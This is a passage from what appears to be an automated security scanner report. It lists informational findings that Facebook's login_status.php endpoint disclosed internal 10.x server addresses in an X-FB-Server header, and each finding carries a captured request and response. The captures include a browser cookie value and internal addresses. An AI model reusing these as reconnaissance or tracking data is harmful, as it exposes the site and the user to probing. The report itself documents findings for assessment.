Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3490a87c&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff28e24ca18&relation=parent&transport=postmessage&frame=f29d19d71
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.80.35
X-Cnection: close
Date: Thu, 05 May 2011 00:59:36 GMT
Content-Length: 0


20.117. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.25.125

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e08a8c5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df290dbda34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df475dd84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32c098aec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b7899b18%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32c098aec&origin=http%3A%2F%2Faol.sportingnews.com%2Ff136968914&relation=parent&transport=postmessage&frame=f3d14f1048
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.25.125
X-Cnection: close
Date: Thu, 05 May 2011 01:13:48 GMT
Content-Length: 0


20.118. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.73.85

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff58e26bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3db059118%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa11ac98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fc7c99bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35489dbbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2fc7c99bc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff23834d3b4&relation=parent&transport=postmessage&frame=f34bac2b9
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.73.85
X-Cnection: close
Date: Thu, 05 May 2011 01:02:41 GMT
Content-Length: 0


20.119. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.91.59

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df876a0bb4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd7b34e7c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20aa5ab4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df365c1183c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e29349dc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f365c1183c&origin=http%3A%2F%2Ftechcrunch.com%2Ff323064cd&relation=parent&transport=postmessage&frame=f16369a394
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.91.59
X-Cnection: close
Date: Thu, 05 May 2011 01:39:50 GMT
Content-Length: 0


20.120. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.76.122

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc6026e1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc235f98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df478f4b1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1af055df4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df331003084%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1af055df4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff42873058&relation=parent&transport=postmessage&frame=f2d0c9bff4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.76.122
X-Cnection: close
Date: Thu, 05 May 2011 02:09:43 GMT
Content-Length: 0


20.121. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.20.55

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a114a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74430bc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1dc849b3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23c1e0b28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3744a7d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f23c1e0b28&origin=http%3A%2F%2Faol.sportingnews.com%2Ff120b5f6&relation=parent&transport=postmessage&frame=ff49b5578
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.20.55
X-Cnection: close
Date: Thu, 05 May 2011 01:41:57 GMT
Content-Length: 0


20.122. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.81.59

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df714303%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36d8d2034%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24c1f259%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df175414498%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df263020634%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f175414498&origin=http%3A%2F%2Ftechcrunch.com%2Ff323064cd&relation=parent&transport=postmessage&frame=fdef7eff4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.81.59
X-Cnection: close
Date: Thu, 05 May 2011 01:39:59 GMT
Content-Length: 0


20.123. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.47.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a9267c6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d787a514%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1180db224%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d8d4d06c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cced65f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1d8d4d06c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff80eb579c&relation=parent&transport=postmessage&frame=f6a353014
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.47.123
X-Cnection: close
Date: Thu, 05 May 2011 01:15:12 GMT
Content-Length: 0


20.124. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.150.53

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d194038c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33b0ff708%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff3b4551%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df228c49d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df181dcb1a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f228c49d6c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff109819bec&relation=parent&transport=postmessage&frame=f1b0736538
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.150.53
X-Cnection: close
Date: Thu, 05 May 2011 01:57:13 GMT
Content-Length: 0


20.125. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.74.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3568e8834%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b0889c7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38dab8b34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df41dfef9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc4630b0c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f41dfef9c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff288a8af98&relation=parent&transport=postmessage&frame=f129c2c24
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.74.69
X-Cnection: close
Date: Thu, 05 May 2011 01:00:03 GMT
Content-Length: 0


20.126. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.119.105

Request

